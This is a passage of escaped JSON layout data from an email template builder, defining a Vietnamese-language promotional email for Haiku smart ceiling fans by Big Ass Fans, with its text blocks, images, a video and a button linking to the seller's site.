B5Q\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 40px 0px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"color\\\":\\\"#c97a14\\\",\\\"textAlign\\\":\\\"right\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: \'Lato\', sans-serif; line-height: 19.6px;\\\\\\\"><span style=\\\\\\\"font-size: 34px; line-height: 47.6px;\\\\\\\"><strong>HAIKU SMART FANS<\\/strong><\\/span><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_4\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"0px\\\",\\\"borderRightColor\\\":\\\"#a5a5a5\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"2px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"0px\\\"},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"55FclmztDX\\\",\\\"contents\\\":[{\\\"id\\\":\\\"88IAIus72W\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5a5a5\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">B\\u1ea1n x\\u1ee9ng \\u0111\\u00e1ng c\\u00f3 m\\u1ed9t chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n l\\u00e0m t\\u0103ng th\\u00eam v\\u1ebb \\u0111\\u1eb9p cho ng\\u00f4i nh\\u00e0 c\\u1ee7a b\\u1ea1n v\\u00e0 l\\u00e0m cho cu\\u1ed9c s\\u1ed1ng c\\u1ee7a b\\u1ea1n tr\\u1edf n\\u00ean \\u0111\\u01a1n gi\\u1ea3n h\\u01a1n. \\u0110\\u01b0\\u1ee3c l\\u00e0m th\\u1ee7 c\\u00f4ng b\\u1eb1ng v\\u1eadt li\\u1ec7u cao c\\u1ea5p v\\u00e0 \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf b\\u1eb1ng c\\u00f4ng ngh\\u1ec7 nh\\u00e0 th\\u00f4ng minh ti\\u00ean ti\\u1ebfn, Haiku \\u0111\\u1ea1i di\\u1ec7n cho phong c\\u00e1ch v\\u00e0 s\\u1ef1 \\u0111\\u1ed5i m\\u1edbi \\u0111\\u1ec9nh cao c\\u1ee7a qu\\u1ea1t tr\\u1ea7n. H\\u01a1n 75 gi\\u1ea3i th\\u01b0\\u1edfng qu\\u1ed1c t\\u1ebf ch\\u1ee9ng nh\\u1eadn ch\\u1ea5t l\\u01b0\\u1ee3ng c\\u1ee7a n\\u00f3, trong khi hi\\u1ec7u qu\\u1ea3 h\\u00e0ng \\u0111\\u1ea7u th\\u1ebf gi\\u1edbi khi\\u1ebfn n\\u00f3 tr\\u1edf th\\u00e0nh s\\u1ef1 l\\u1ef1a ch\\u1ecdn ho\\u00e0n h\\u1ea3o cho nh\\u1eefng ch\\u1ee7 nh\\u00e0 quan t\\u00e2m \\u0111\\u1ebfn n\\u0103ng l\\u01b0\\u1ee3ng.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"lE-11Qb1fk\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/haiku.hogiaphat.vn\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#c97a14\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Xem th\\u00eam<br \\/><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":114,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"bXYUs1ZZby\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"eo9KgENRVd\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZrgjmhET6A\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"57%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#b6b6b6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px 10px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"GOL31FaRLf\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hwbTiM3Utx\\\",\\\"contents\\\":[{\\\"id\\\":\\\"oMjfj_SbVL\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296773906-login_customers.jpg\\\",\\\"width\\\":1920,\\\"height\\\":1080},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"TVD-E1BXTh\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 0px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002000922-vvb.png\\\",\\\"width\\\":600,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"em1-YlvAoX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_fkVaQ2PEN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wLx5W-qwDc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122312096-haiku-logo.png\\\",\\\"width\\\":718,\\\"height\\\":185},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"qZBv269hpu\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Kh\\u00f4ng c\\u00f3 nh\\u00e0 s\\u1ea3n xu\\u1ea5t qu\\u1ea1t n\\u00e0o n\\u1ed7 l\\u1ef1c t\\u1ea1o ra c\\u00e1c s\\u1ea3n ph\\u1ea9m ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng h\\u01a1n Qu\\u1ea1t Big Ass. \\u0110\\u00f3 l\\u00e0 l\\u00fd do t\\u1ea1i sao c\\u00e1c doanh nghi\\u1ec7p tr\\u00ean to\\u00e0n th\\u1ebf gi\\u1edbi s\\u1eed d\\u1ee5ng qu\\u1ea1t c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 c\\u1eaft gi\\u1ea3m t\\u1edbi 30% chi ph\\u00ed s\\u01b0\\u1edfi \\u1ea5m v\\u00e0 l\\u00e0m m\\u00e1t v\\u00e0 t\\u1ea1i sao c\\u00e1c nh\\u00e0 thi\\u1ebft k\\u1ebf d\\u1ef1a v\\u00e0o c\\u00e1c m\\u1eabu qu\\u1ea1t tr\\u1ea7n \\u0111\\u01b0\\u1ee3c x\\u1ebfp h\\u1ea1ng ENERGY STAR\\u00ae c\\u1ee7a ch\\u00fang t\\u00f4i \\u0111\\u1ec3 \\u0111\\u00e1p \\u1ee9ng nhu c\\u1ea7u ng\\u00e0y c\\u00e0ng t\\u0103ng \\u0111\\u1ed1i v\\u1edbi c\\u00e1c d\\u1ef1 \\u00e1n b\\u1ec1n v\\u1eefng, \\u0111\\u01b0\\u1ee3c ch\\u1ee9ng nh\\u1eadn LEED.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#cc7202\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"ilEcft3K21\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KQFvi5e5Kf\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VqJpOx53SF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 0px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002319908-vvb2.png\\\",\\\"width\\\":600,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_7\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"opHjyGdo4n\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"5EjQAT1In3\\\",\\\"contents\\\":[{\\\"id\\\":\\\"fa-SDaQMps\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N TH\\u00d4NG MINH, C\\u00c1C CH\\u1ebe \\u0110\\u1ed8 TH\\u00d4NG MINH<\\/strong><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"SMsQFcA9L4\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 150%;\\\\\\\">Haiku c\\u00f3 th\\u1ec3 b\\u1eaft ch\\u01b0\\u1edbc m\\u1ed9t l\\u00e0n gi\\u00f3 nh\\u1eb9, ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng, \\u0111i\\u1ec1u ch\\u1ec9nh \\u0111\\u1ec3 c\\u00f3 gi\\u1ea5c ng\\u1ee7 t\\u1ed1i \\u01b0u v\\u00e0 ch\\u1ea1y tr\\u00ean \\u0111\\u1ed3ng h\\u1ed3 b\\u1ea5m gi\\u1edd\\u2014t\\u1ea5t c\\u1ea3 th\\u00f4ng qua \\u0111i\\u1ec1u khi\\u1ec3n t\\u1eeb xa \\u0111i k\\u00e8m ho\\u1eb7c \\u1ee9ng d\\u1ee5ng di \\u0111\\u1ed9ng Haiku c\\u1ee7a Big Ass Fans.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"aVoSxPEcGT\\\",\\\"contents\\\":[{\\\"id\\\":\\\"0dAzzodDxa\\\",\\\"type\\\":\\\"video\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"video\\\":{\\\"url\\\":\\\"https:\\/\\/youtu.be\\/AjYMiqVCkrw?lis\\\",\\\"thumbnail\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677123215015-video_youtube_AjYMiqVCkrw.jpg\\\",\\\"videoId\\\":\\\"AjYMiqVCkrw\\\",\\\"type\\\":\\\"youtube\\\"},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_video_1\\\",\\\"htmlClassNames\\\":\\\"u_content_video\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"THUwYakHTm\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"kwzqhG799A\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3tEuovNfbn\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"0px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"20px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"R2C4DOPmwe\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677296625467-quet_BR_code_2023.jpg\\\",\\\"width\\\":800,\\\"height\\\":491},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_17\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#bfd8d2\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_13\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"OL